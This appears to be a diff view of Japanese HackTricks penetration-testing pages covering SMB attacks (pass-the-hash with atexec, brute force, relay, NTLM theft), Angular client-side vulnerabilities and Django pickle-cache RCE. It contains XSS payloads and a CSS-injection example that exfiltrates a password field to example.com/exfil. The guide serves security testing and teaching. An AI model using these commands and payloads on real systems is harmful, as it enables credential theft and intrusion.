### [AtExec](../windows-hardening/ntlm/atexec.md)
SMBを介してタスクスケジューラ経由でコマンドを実行します (_\pipe\atsvc_ を使用)。\
**kali** では /usr/share/doc/python3-impacket/examples/ にあります。
```bash
./atexec.py [[domain/]username[:password]@]<targetName or address> "command"
./atexec.py -hashes <LM:NT> administrator@10.10.10.175 "whoami"
```
## Impacket reference
[https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/)
## **ユーザーの資格情報をブルートフォース攻撃する**
**これは推奨されません。最大許可試行回数を超えるとアカウントがブロックされる可能性があります**
```bash
nmap --script smb-brute -p 445 <IP>
ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name
```
## SMBリレー攻撃
この攻撃は、Responderツールキットを使用して**内部ネットワーク上のSMB認証セッションをキャプチャ**し、それを**ターゲットマシン**に**中継**します。認証**セッションが成功すると**、自動的に**システム**の**シェル**に入ります。\
[**この攻撃に関する詳細情報はこちら。**](../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
## SMB-Trap
WindowsライブラリURLMon.dllは、ページがSMBを介してコンテンツにアクセスしようとすると、自動的にホストに認証を試みます。例えば`img src="\\10.10.10.10\path\image.jpg"`
これは以下の関数で発生します:
- URLDownloadToFile
- URLDownloadToCache
- URLOpenStream
- URLOpenBlockingStream
これらは一部のブラウザやツールSkypeなどによって使用されます。
![出典: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../images/image (93).png>)
### MitMfを使用したSMBTrap
![出典: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../images/image (94).png>)
## NTLM窃盗
SMBトラッピングに似て、ターゲットシステムに悪意のあるファイルを植え付ける例えばSMB経由でことで、SMB認証の試行を引き起こし、NetNTLMv2ハッシュをResponderのようなツールで傍受することができます。ハッシュはオフラインでクラックするか、[SMBリレー攻撃](pentesting-smb.md#smb-relay-attack)に使用できます。
[参照: ntlm_theft](../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm_theft)
## HackTricks自動コマンド
```
Protocol_Name: SMB #Protocol Abbreviation if there is one.
Port_Number: 137,138,139 #Comma separated if there is more than one.
Protocol_Description: Server Message Block #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for SMB
Note: |
While Port 139 is known technically as NBT over IP, Port 445 is SMB over IP. SMB stands for Server Message Blocks. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.
#These are the commands I run in order every time I see an open SMB port
With No Creds
nbtscan {IP}
smbmap -H {IP}
smbmap -H {IP} -u null -p null
smbmap -H {IP} -u guest
smbclient -N -L //{IP}
smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
rpcclient {IP}
rpcclient -U "" {IP}
crackmapexec smb {IP}
crackmapexec smb {IP} --pass-pol -u "" -p ""
crackmapexec smb {IP} --pass-pol -u "guest" -p ""
GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
getArch.py -target {IP}
With Creds
smbmap -H {IP} -u {Username} -p {Password}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
crackmapexec smb {IP} -u {Username} -p {Password} --shares
GetADUsers.py {Domain_Name}/{Username}:{Password} -all
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smb/index.html
Entry_2:
Name: Enum4Linux
Description: General SMB Scan
Command: enum4linux -a {IP}
Entry_3:
Name: Nmap SMB Scan 1
Description: SMB Vuln Scan With Nmap
Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}
Entry_4:
Name: Nmap Smb Scan 2
Description: SMB Vuln Scan With Nmap (Less Specific)
Command: nmap --script 'smb-vuln*' -Pn -p 139,445 {IP}
Entry_5:
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb
Entry_6:
Name: SMB/SMB2 139/445 consolesless mfs enumeration
Description: SMB/SMB2 139/445 enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'
```
{{#include ../banners/hacktricks-training.md}}

112
src/network-services-pentesting/pentesting-web/angular.md
View File

@ -1,11 +1,13 @@
# Angular
{{#include /banners/hacktricks-training.md}}
## チェックリスト
チェックリスト [こちらから](https://lsgeurope.com/post/angular-security-checklist)。
* [ ] Angularはクライアントサイドフレームワークと見なされ、サーバーサイドの保護を提供することは期待されていない
* [ ] スクリプトのソースマップはプロジェクト設定で無効になっている
* [ ] プロジェクト設定でスクリプトのソースマップが無効になっている
* [ ] 信頼できないユーザー入力は常にテンプレートで使用される前に補間またはサニタイズされる
* [ ] ユーザーはサーバーサイドまたはクライアントサイドのテンプレートを制御できない
* [ ] 信頼できないユーザー入力は、アプリケーションによって信頼される前に適切なセキュリティコンテキストを使用してサニタイズされる
@ -14,7 +16,7 @@
## Angularとは
Angularは、**Google**によって維持されている**強力な**かつ**オープンソース**のフロントエンドフレームワークです。**TypeScript**を使用してコードの可読性とデバッグを向上させます。強力なセキュリティメカニズムにより、Angularは**XSS**や**オープンリダイレクト**などの一般的なクライアントサイドの脆弱性を防ぎます。また、**サーバーサイド**でも使用できるため、**両方の視点**からセキュリティ考慮が重要です。
Angularは、**Google**によって維持されている**強力な**かつ**オープンソース**のフロントエンドフレームワークです。**TypeScript**を使用してコードの可読性とデバッグを向上させます。強力なセキュリティメカニズムにより、Angularは**XSS**や**オープンリダイレクト**などの一般的なクライアントサイドの脆弱性を防ぎます。また、**サーバーサイド**でも使用できるため、**両方の視点**からセキュリティ考慮が重要です。
## フレームワークアーキテクチャ
@ -39,17 +41,17 @@ my-workspace/
├── angular.json #provides workspace-wide and project-specific configuration defaults
└── tsconfig.json #provides the base TypeScript configuration for projects in the workspace
```
ドキュメントによると、すべてのAngularアプリケーションには少なくとも1つのコンポーネントすなわちコンポーネント階層をDOMに接続するルートコンポーネント`AppComponent`があります。各コンポーネントは、アプリケーションデータとロジックを含むクラスを定義し、ターゲット環境に表示されるビューを定義するHTMLテンプレートに関連付けられています。`@Component()`デコレーターは、その直下のクラスをコンポーネントとして識別し、テンプレートおよび関連するコンポーネント固有のメタデータを提供します。`AppComponent``app.component.ts`ファイルで定義されています。
ドキュメントによると、すべてのAngularアプリケーションには、コンポーネント階層をDOMに接続するルートコンポーネント`AppComponent`)が少なくとも1つあります。各コンポーネントは、アプリケーションデータとロジックを含むクラスを定義し、ターゲット環境に表示されるビューを定義するHTMLテンプレートに関連付けられています。`@Component()`デコレーターは、その直下のクラスをコンポーネントとして識別し、テンプレートおよび関連するコンポーネント固有のメタデータを提供します。`AppComponent``app.component.ts`ファイルで定義されています。
Angular NgModulesは、アプリケーションドメイン、ワークフロー、または密接に関連する機能セットに専念したコンポーネントのセットのコンパイルコンテキストを宣言します。すべてのAngularアプリケーションには、通常`AppModule`と呼ばれるルートモジュールがあり、アプリケーションを起動するブートストラップメカニズムを提供します。アプリケーションは通常、多くの機能モジュールを含みます。`AppModule``app.module.ts`ファイルで定義されています。
Angular NgModulesは、アプリケーションドメイン、ワークフロー、または密接に関連する機能セットに専念するコンポーネントのセットのコンパイルコンテキストを宣言します。すべてのAngularアプリケーションには、通常`AppModule`と呼ばれるルートモジュールがあり、アプリケーションを起動するブートストラップメカニズムを提供します。アプリケーションには通常、多くの機能モジュールが含まれています。`AppModule``app.module.ts`ファイルで定義されています。
Angular `Router` NgModuleは、アプリケーション内の異なるアプリケーション状態とビュー階層の間でナビゲーションパスを定義できるサービスを提供します。`RouterModule``app-routing.module.ts`ファイルで定義されています。
特定のビューに関連付けられていないデータやロジックを共有したい場合は、サービスクラスを作成します。サービスクラスの定義は、`@Injectable()`デコレーターによって直前に示されます。このデコレーターは、他のプロバイダーがクラスに依存関係として注入されることを可能にするメタデータを提供します。依存性注入DIにより、コンポーネントクラスをスリムで効率的に保つことができます。これらはサーバーからデータを取得したり、ユーザー入力を検証したり、コンソールに直接ログを記録したりすることはなく、そのようなタスクをサービスに委任します。
特定のビューに関連付けられていないデータやロジックを共有したい場合は、サービスクラスを作成します。サービスクラスの定義は、`@Injectable()`デコレーターによって直前に示されます。このデコレーターは、他のプロバイダーを依存関係としてクラスに注入できるようにするメタデータを提供します。依存性注入DIにより、コンポーネントクラスをスリムで効率的に保つことができます。これらはサーバーからデータを取得したり、ユーザー入力を検証したり、コンソールに直接ログを記録したりすることはなく、そのようなタスクをサービスに委任します。
## Sourcemap configuration
Angularフレームワークは、`tsconfig.json`オプションに従ってTypeScriptファイルをJavaScriptコードに変換し、その後`angular.json`構成でプロジェクトをビルドします。`angular.json`ファイルを見ると、ソースマップを有効または無効にするオプションがあることがわかりました。Angularのドキュメントによると、デフォルトの構成ではスクリプト用のソースマップファイルが有効になっており、デフォルトでは隠されていません。
Angularフレームワークは、`tsconfig.json`オプションに従ってTypeScriptファイルをJavaScriptコードに変換し、その後`angular.json`構成でプロジェクトをビルドします。`angular.json`ファイルを見てみると、ソースマップを有効または無効にするオプションがあることがわかりました。Angularのドキュメントによると、デフォルトの構成ではスクリプト用のソースマップファイルが有効になっており、デフォルトでは隠されていません。
```json
"sourceMap": {
"scripts": true,
@ -58,13 +60,13 @@ Angularフレームワークは、`tsconfig.json`オプションに従ってType
"hidden": false
}
```
一般的に、sourcemapファイルはデバッグ目的で使用され、生成されたファイルを元のファイルにマッピングします。したがって、プロダクション環境での使用は推奨されません。sourcemapsが有効になっている場合、Angularプロジェクトの元の状態を再現することで可読性が向上し、ファイル分析に役立ちます。しかし、無効にされている場合、レビュアーはアンチセキュリティパターンを検索することでコンパイルされたJavaScriptファイルを手動で分析できます。
一般的に、sourcemapファイルはデバッグ目的で使用され、生成されたファイルを元のファイルにマッピングします。したがって、プロダクション環境での使用は推奨されません。sourcemapsが有効になっている場合、Angularプロジェクトの元の状態を再現することで可読性が向上し、ファイル分析に役立ちます。しかし、無効になっている場合、レビュアーはセキュリティ対策パターンを検索することで、コンパイルされたJavaScriptファイルを手動で分析することができます。
さらに、AngularプロジェクトのコンパイルされたJavaScriptファイルは、ブラウザの開発者ツール → Sourcesまたは Debugger and Sources → \[id].main.js で見つけることができます。有効なオプションに応じて、このファイルの最後に `//# sourceMappingURL=[id].main.js.map` という行が含まれている場合もあれば、**hidden**オプションが**true**に設定されている場合は含まれていないこともあります。それにもかかわらず、**scripts**のsourcemapが無効になっている場合、テストはより複雑になり、ファイルを取得することはできません。さらに、プロジェクトビルド中にsourcemapを有効にすることができます。例えば、`ng build --source-map`のように
さらに、AngularプロジェクトのコンパイルされたJavaScriptファイルは、ブラウザの開発者ツール → Sourcesまたは Debugger and Sources → \[id].main.js にあります。有効なオプションに応じて、このファイルの最後に `//# sourceMappingURL=[id].main.js.map` という行が含まれている場合もあれば、**hidden**オプションが**true**に設定されている場合は含まれていないこともあります。それにもかかわらず、**scripts**のsourcemapが無効になっている場合、テストはより複雑になり、ファイルを取得することはできません。さらに、プロジェクトビルド中に `ng build --source-map` のようにsourcemapを有効にすることができます
## データバインディング
バインディングは、コンポーネントとその対応するビュー間の通信プロセスを指します。これは、Angularフレームワークにデータを送受信するために使用されます。データは、イベント、補間、プロパティ、または双方向バインディングメカニズムを通じて渡すことができます。さらに、データは関連するコンポーネント親子関係間や、サービス機能を使用して無関係な2つのコンポーネント間でも共有できます。
バインディングは、コンポーネントとその対応するビュー間の通信プロセスを指します。これは、Angularフレームワークとの間でデータを転送するために使用されます。データは、イベント、補間、プロパティ、または双方向バインディングメカニズムを通じて渡すことができます。さらに、データは関連するコンポーネント親子関係間や、サービス機能を使用して無関係な2つのコンポーネント間でも共有できます。
バインディングはデータフローによって分類できます:
@ -77,17 +79,17 @@ Angularフレームワークは、`tsconfig.json`オプションに従ってType
| タイプ | ターゲット | 例 |
| --------- | -------------------------------------------------------- | -------------------------------------------------------------------- |
| プロパティ | 要素プロパティ、コンポーネントプロパティ、ディレクティブプロパティ | \<img \[alt]="hero.name" \[src]="heroImageUrl"> |
| イベント | 要素イベント、コンポーネントイベント、ディレクティブイベント | \<button type="button" (click)="onSave()">保存 |
| イベント | 要素イベント、コンポーネントイベント、ディレクティブイベント | \<button type="button" (click)="onSave()">Save |
| 双方向 | イベントとプロパティ | \<input \[(ngModel)]="name"> |
| 属性 | 属性(例外) | \<button type="button" \[attr.aria-label]="help">help |
| クラス | クラスプロパティ | \<div \[class.special]="isSpecial">特別 |
| クラス | クラスプロパティ | \<div \[class.special]="isSpecial">Special |
| スタイル | スタイルプロパティ | \<button type="button" \[style.color]="isSpecial ? 'red' : 'green'"> |
## Angularセキュリティモデル
Angularの設計には、すべてのデータのエンコーディングまたはサニタイズがデフォルトで含まれており、AngularプロジェクトにおけるXSS脆弱性の発見と悪用がますます困難になっています。データ処理には2つの異なるシナリオがあります
1. 補間または `{{user_input}}` - コンテキストに応じたエンコーディングを行い、ユーザー入力をテキストとして解釈します;
1. 補間または `{{user_input}}` - コンテキストに応じたエンコーディングを実行し、ユーザー入力をテキストとして解釈します;
```jsx
//app.component.ts
@ -98,7 +100,7 @@ test = "<script>alert(1)</script><h1>test</h1>";
```
結果: `&lt;script&gt;alert(1)&lt;/script&gt;&lt;h1&gt;test&lt;/h1&gt;`
2. プロパティ、属性、クラス、スタイルへのバインディングまたは `[attribute]="user_input"` - 提供されたセキュリティコンテキストに基づいてサニタイズを行います。
2. プロパティ、属性、クラス、スタイルへのバインディングまたは `[attribute]="user_input"` - 提供されたセキュリティコンテキストに基づいてサニタイズを実行します。
```jsx
//app.component.ts
@ -110,34 +112,34 @@ test = "<script>alert(1)</script><h1>test</h1>";
結果: `<div><h1>test</h1></div>`
`SecurityContext`には6種類があります:
`SecurityContext` のタイプは6つあります:
* `None`;
* `HTML`は、値をHTMLとして解釈する際に使用されます
* `STYLE`は、CSSを`style`プロパティにバインディングする際に使用されます;
* `URL`は、`<a href>`のようなURLプロパティに使用されます
* `SCRIPT`は、JavaScriptコードに使用されます
* `RESOURCE_URL`は、コードとして読み込まれ実行されるURLで、例えば`<script src>`で使用されます。
* `HTML` は、値をHTMLとして解釈する際に使用されます
* `STYLE` は、CSSを `style` プロパティにバインディングする際に使用されます;
* `URL` は、`<a href>` のようなURLプロパティに使用されます
* `SCRIPT` は、JavaScriptコードに使用されます
* `RESOURCE_URL` は、コードとして読み込まれ実行されるURLで、例えば `<script src>` で使用されます。
## 脆弱性
### セキュリティトラストメソッドのバイパス
Angularは、デフォルトのサニタイズプロセスをバイパスし、特定のコンテキストで値が安全に使用できることを示すためのメソッドのリストを導入しています。以下の5つの例のように
Angularは、デフォルトのサニタイズプロセスをバイパスし、特定のコンテキストで値が安全に使用できることを示すためのメソッドのリストを導入しています。以下の5つの例があります
1. `bypassSecurityTrustUrl`は、指定された値が安全なスタイルURLであることを示すために使用されます
1. `bypassSecurityTrustUrl` は、指定された値が安全なスタイルURLであることを示すために使用されます
```jsx
//app.component.ts
this.trustedUrl = this.sanitizer.bypassSecurityTrustUrl('javascript:alert()');
//app.component.html
<a class="e2e-trusted-url" [href]="trustedUrl">クリックしてください</a>
<a class="e2e-trusted-url" [href]="trustedUrl">Click me</a>
//結果
<a _ngcontent-pqg-c12="" class="e2e-trusted-url" href="javascript:alert()">クリックしてください</a>
//result
<a _ngcontent-pqg-c12="" class="e2e-trusted-url" href="javascript:alert()">Click me</a>
```
2. `bypassSecurityTrustResourceUrl`は、指定された値が安全なリソースURLであることを示すために使用されます
2. `bypassSecurityTrustResourceUrl` は、指定された値が安全なリソースURLであることを示すために使用されます
```jsx
//app.component.ts
@ -146,23 +148,23 @@ this.trustedResourceUrl = this.sanitizer.bypassSecurityTrustResourceUrl("https:/
//app.component.html
<iframe [src]="trustedResourceUrl"></iframe>
//結果
//result
<img _ngcontent-nre-c12="" src="https://www.google.com/images/branding/googlelogo/1x/googlelogo_light_color_272x92dp.png">
```
3. `bypassSecurityTrustHtml`は、指定された値が安全なHTMLであることを示すために使用されます。`script`要素をこの方法でDOMツリーに挿入しても、含まれるJavaScriptコードは実行されません。これは、これらの要素がDOMツリーに追加される方法によるものです。
3. `bypassSecurityTrustHtml` は、指定された値が安全なHTMLであることを示すために使用されます。注意すべきは、この方法でDOMツリーに `script` 要素を挿入しても、含まれるJavaScriptコードが実行されることはないということです。
```jsx
//app.component.ts
this.trustedHtml = this.sanitizer.bypassSecurityTrustHtml("<h1>htmlタグ</h1><svg onclick=\"alert('bypassSecurityTrustHtml')\" style=display:block>blah</svg>");
this.trustedHtml = this.sanitizer.bypassSecurityTrustHtml("<h1>html tag</h1><svg onclick=\"alert('bypassSecurityTrustHtml')\" style=display:block>blah</svg>");
//app.component.html
<p style="border:solid" [innerHtml]="trustedHtml"></p>
//結果
<h1>htmlタグ</h1>
//result
<h1>html tag</h1>
<svg onclick="alert('bypassSecurityTrustHtml')" style="display:block">blah</svg>
```
4. `bypassSecurityTrustScript`は、指定された値が安全なJavaScriptであることを示すために使用されます。ただし、このメソッドを使用してテンプレート内でJSコードを実行できなかったため、その動作は予測不可能であることがわかりました。
4. `bypassSecurityTrustScript` は、指定された値が安全なJavaScriptであることを示すために使用されます。しかし、このメソッドを使用してテンプレート内でJSコードを実行できなかったため、その動作は予測不可能であることがわかりました。
```jsx
//app.component.ts
@ -171,10 +173,10 @@ this.trustedScript = this.sanitizer.bypassSecurityTrustScript("alert('bypass Sec
//app.component.html
<script [innerHtml]="trustedScript"></script>
//結果
//result
-
```
5. `bypassSecurityTrustStyle`は、指定された値が安全なCSSであることを示すために使用されます。以下の例はCSSインジェクションを示しています
5. `bypassSecurityTrustStyle` は、指定された値が安全なCSSであることを示すために使用されます。以下の例はCSSインジェクションを示しています
```jsx
//app.component.ts
@ -183,17 +185,17 @@ this.trustedStyle = this.sanitizer.bypassSecurityTrustStyle('background-image: u
//app.component.html
<input type="password" name="pwd" value="01234" [style]="trustedStyle">
//結果
リクエストURL: GET example.com/exfil/a
//result
Request URL: GET example.com/exfil/a
```
Angularは、ビューに表示する前にデータをサニタイズするための `sanitize` メソッドを提供します。このメソッドは提供されたセキュリティコンテキストを使用し、入力を適切にクリーンアップします。ただし、特定のデータとコンテキストに対して正しいセキュリティコンテキストを使用することが重要です。たとえば、HTMLコンテンツに `SecurityContext.URL` を適用すると、危険なHTML値に対する保護提供されません。このようなシナリオでは、セキュリティコンテキストの誤用がXSS脆弱性を引き起こす可能性があります。
Angularは、ビューに表示する前にデータをサニタイズするための `sanitize` メソッドを提供しています。このメソッドは提供されたセキュリティコンテキストを使用し、入力を適切にクリーンアップします。ただし、特定のデータとコンテキストに対して正しいセキュリティコンテキストを使用することが重要です。たとえば、HTMLコンテンツに `SecurityContext.URL` を適用すると、危険なHTML値に対する保護提供されません。このようなシナリオでは、セキュリティコンテキストの誤用がXSS脆弱性を引き起こす可能性があります。
### HTMLインジェクション
この脆弱性は、ユーザー入力が `innerHTML``outerHTML`、または `iframe` `srcdoc` のいずれかの3つのプロパティにバインドされるときに発生します。これらの属性にバインドすると、HTMLがそのまま解釈され、入力は `SecurityContext.HTML` を使用してサニタイズされます。したがって、HTMLインジェクションは可能ですが、クロスサイトスクリプティングXSSは発生しません。
この脆弱性は、ユーザー入力が `innerHTML``outerHTML`、または `iframe` `srcdoc` のいずれかの3つのプロパティにバインドされるときに発生します。これらの属性にバインドすると、HTMLがそのまま解釈され、入力は `SecurityContext.HTML` を使用してサニタイズされます。したがって、HTMLインジェクションは可能ですが、クロスサイトスクリプティングXSSは発生しません。
`innerHTML`を使用した例:
`innerHTML` を使用した例:
```jsx
//app.component.ts
import { Component} from '@angular/core';
@ -227,11 +229,11 @@ selector: 'app-root',
template: '<h1>title</h1>' + _userInput
})
```
上記のように、`constructor`はObject`constructor`プロパティのスコープを指し、Stringコンストラクタを呼び出して任意のコードを実行することを可能にします。
上記のように、`constructor`はObject `constructor`プロパティのスコープを指し、Stringコンストラクタを呼び出して任意のコードを実行することを可能にします。
#### サーバーサイドレンダリング (SSR)
CSRがブラウザのDOMで発生するのに対し、Angular UniversalはテンプレートファイルのSSRを担当します。これらのファイルはユーザーに配信されます。この区別にもかかわらず、Angular UniversalはSSRのセキュリティを強化するためにCSRで使用されるのと同じサニタイズメカニズムを適用します。SSRにおけるテンプレートインジェクションの脆弱性は、使用されるテンプレート言語が同じであるため、CSRと同じ方法で検出できます。
CSRがブラウザのDOMで発生するのに対し、Angular UniversalはテンプレートファイルのSSRを担当します。これらのファイルはユーザーに配信されます。この区別にもかかわらず、Angular UniversalはCSRで使用されるのと同じサニタイズメカニズムを適用してSSRのセキュリティを強化します。SSRにおけるテンプレートインジェクションの脆弱性は、使用されるテンプレート言語が同じであるため、CSRと同じ方法で検出できます。
もちろん、PugやHandlebarsなどのサードパーティのテンプレートエンジンを使用する際に、新しいテンプレートインジェクションの脆弱性が導入される可能性もあります。
@ -239,7 +241,7 @@ CSRがブラウザのDOMで発生するのに対し、Angular Universalはテン
#### DOMインターフェース
前述のように、_Document_インターフェースを使用してDOMに直接アクセスできます。ユーザー入力が事前に検証されていない場合、クロスサイトスクリプティング (XSS) の脆弱性につながる可能性があります。
前述のように、_Document_インターフェースを使用してDOMに直接アクセスできます。ユーザー入力が事前に検証されていない場合、クロスサイトスクリプティングXSS脆弱性につながる可能性があります。
以下の例では、`document.write()`および`document.createElement()`メソッドを使用しました:
```jsx
@ -292,7 +294,7 @@ document.body.appendChild(a);
```
#### Angularクラス
AngularでDOM要素を操作するために使用できるクラスがいくつかあります`ElementRef``Renderer2``Location`、および`Document`。最後の2つのクラスについての詳細な説明は、**Open redirects**セクションに記載されています。最初の2つの主な違いは、`Renderer2` APIがDOM要素とコンポーネントコードの間に抽象化の層を提供するのに対し、`ElementRef`は単に要素への参照を保持することです。したがって、Angularのドキュメントによれば、`ElementRef` APIはDOMへの直接アクセスが必要な場合の最後の手段としてのみ使用されるべきです。
AngularでDOM要素を操作するために使用できるクラスがいくつかあります`ElementRef``Renderer2``Location`、および`Document`。最後の2つのクラスについての詳細な説明は、**オープンリダイレクト**セクションに記載されています。最初の2つの主な違いは、`Renderer2` APIがDOM要素とコンポーネントコードの間に抽象化の層を提供するのに対し、`ElementRef`は単に要素への参照を保持することです。したがって、Angularのドキュメントによれば、`ElementRef` APIはDOMへの直接アクセスが必要な場合の最後の手段としてのみ使用べきです。
* `ElementRef`には、DOM要素を操作するために使用できる`nativeElement`プロパティが含まれています。ただし、`nativeElement`の不適切な使用は、以下に示すようにXSSインジェクションの脆弱性を引き起こす可能性があります
@ -315,7 +317,7 @@ this.elementRef.nativeElement.appendChild(s);
}
}
```
* `Renderer2`がネイティブ要素への直接アクセスがサポートされていない場合でも安全に使用できるAPIを提供するにもかかわらず、いくつかのセキュリティの欠陥があります。`Renderer2`を使用すると、`setAttribute()`メソッドを使用してHTML要素に属性を設定できますが、XSS防止メカニズムはありません。
* `Renderer2`がネイティブ要素への直接アクセスがサポートされていない場合でも安全に使用できるAPIを提供するにもかかわらず、いくつかのセキュリティの欠陥があります。`Renderer2`を使用すると、`setAttribute()`メソッドを使用してHTML要素に属性を設定できますが、XSS防止メカニズムはありません。
```tsx
//app.component.ts
@ -371,7 +373,7 @@ this.renderer2.setProperty(this.img.nativeElement, 'innerHTML', '<img src=1 oner
<button (click)="setProperty()">Click me!</button>
```
私たちの研究中に`setStyle()``createComment()`、および`setValue()`などの他の`Renderer2`メソッドの動作もXSSおよびCSSインジェクションに関連して調査しました。しかし、これらのメソッドの機能的制限のため、有効な攻撃ベクターを見つけることはできませんでした。
私たちの研究の中で`setStyle()``createComment()`、および`setValue()`などの他の`Renderer2`メソッドの動作もXSSおよびCSSインジェクションに関連して調査しました。しかし、これらのメソッドの機能的制限のため、有効な攻撃ベクターを見つけることはできませんでした。
#### jQuery
@ -404,7 +406,7 @@ $("p").html("<script>alert(1)</script>");
<button>Click me</button>
<p>some text here</p>
```
* `jQuery.parseHTML()`メソッドは、文字列を一連のDOMードに変換するためにネイティブメソッドを使用し、それをドキュメントに挿入できます。
* `jQuery.parseHTML()`メソッドは、文字列をDOMードのセットに変換するためにネイティブメソッドを使用し、それを文書に挿入できます。
```tsx
jQuery.parseHTML(data [, context ] [, keepScripts ])
@ -442,15 +444,15 @@ $palias.append(html);
<p id="palias">some text</p>
```
### Open redirects
### オープンリダイレクト
#### DOMインターフェース
W3Cのドキュメントによると、`window.location`および`document.location`オブジェクトは、現代のブラウザではエイリアスとして扱われます。これが、いくつかのメソッドやプロパティの実装が似ている理由であり、これにより、以下に示すように`javascript://`スキーマ攻撃によるオープンリダイレクトやDOM XSSが引き起こされる可能性があります。
W3Cのドキュメントによると、`window.location`および`document.location`オブジェクトは、現代のブラウザではエイリアスとして扱われます。これが理由で、いくつかのメソッドやプロパティの実装が似てり、以下に示すように`javascript://`スキーマ攻撃によるオープンリダイレクトやDOM XSSを引き起こす可能性があります。
* `window.location.href`(および`document.location.href`
現在のDOMロケーションオブジェクトを取得するための標準的な方法は、`window.location`を使用することです。また、これを使用してブラウザを新しいページにリダイレクトすることもできます。その結果、このオブジェクトを制御することで、オープンリダイレクトの脆弱性を悪用することができます。
現在のDOMロケーションオブジェクトを取得するための標準的な方法は、`window.location`を使用することです。また、ブラウザを新しいページにリダイレクトするためにも使用できます。その結果、このオブジェクトを制御することで、オープンリダイレクトの脆弱性を悪用できます。
```tsx
//app.component.ts
@ -496,7 +498,7 @@ window.location.replace("http://google.com/about")
```
* `window.open()`
`window.open()`メソッドは、URLを受け取り、それが識別するリソースを新しいタブまたはウィンドウに読み込みます。このメソッドを制御できる場合、XSSまたはオープンリダイレクトの脆弱性を引き起こす機会があるかもしれません
`window.open()`メソッドは、URLを受け取り、それが識別するリソースを新しいタブまたはウィンドウに読み込みます。このメソッドを制御することは、XSSまたはオープンリダイレクトの脆弱性を引き起こす機会にもなります
```tsx
//app.component.ts
@ -510,7 +512,7 @@ window.open("https://google.com/about", "_blank")
#### Angularクラス
* Angularのドキュメントによれば、Angularの`Document`はDOMドキュメントと同じであり、Angular内のクライアントサイドの脆弱性を悪用するためにDOMドキュメントの一般的なベクターを使用することが可能です。`Document.location`プロパティとメソッドは、以下の例に示すように、成功したオープンリダイレクト攻撃のシンクになる可能性があります:
* Angularのドキュメントによれば、Angularの`Document`はDOMドキュメントと同じであり、Angular内のクライアントサイドの脆弱性を悪用するためにDOMドキュメントの一般的なベクターを使用できることを意味します。`Document.location`プロパティとメソッドは、以下の例のように成功したオープンリダイレクト攻撃のシンクになる可能性があります:
```tsx
//app.component.ts
@ -557,8 +559,8 @@ console.log(this.location.go("http://google.com/about"));
}
```
結果`http://localhost:4200/http://google.com/about`
* Angularの`Router`クラスは主に同じドメイン内のナビゲーションに使用され、アプリケーションに追加の脆弱性を導入しません:
結果: `http://localhost:4200/http://google.com/about`
* Angularの`Router`クラスは主に同じドメイン内のナビゲーションに使用され、アプリケーションに追加の脆弱性をもたらすことはありません:
```jsx
//app-routing.module.ts
@ -566,7 +568,7 @@ const routes: Routes = [
{ path: '', redirectTo: 'https://google.com', pathMatch: 'full' }]
```
結果`http://localhost:4200/https:`
結果: `http://localhost:4200/https:`
以下のメソッドもドメインの範囲内でナビゲートします:
@ -601,3 +603,7 @@ this.router.navigateByUrl('URL')
* [Angular Document](https://angular.io/api/common/DOCUMENT)
* [Angular Location](https://angular.io/api/common/Location)
* [Angular Router](https://angular.io/api/router/Router)
{{#include /banners/hacktricks-training.md}}

12
src/network-services-pentesting/pentesting-web/django.md
View File

@ -1,8 +1,12 @@
# Django
## Cache Manipulation to RCE
Djangoのデフォルトのキャッシュストレージ方法は[Python pickles](https://docs.python.org/3/library/pickle.html)であり、[信頼できない入力がアンピクルされる](https://media.blackhat.com/bh-us-11/Slaviero/BH_US_11_Slaviero_Sour_Pickles_Slides.pdf)とRCEにつながる可能性があります。**攻撃者がキャッシュへの書き込みアクセスを取得できれば、この脆弱性を基盤となるサーバーでのRCEにエスカレートさせることができます**。
{{#include /banners/hacktricks-training.md}}
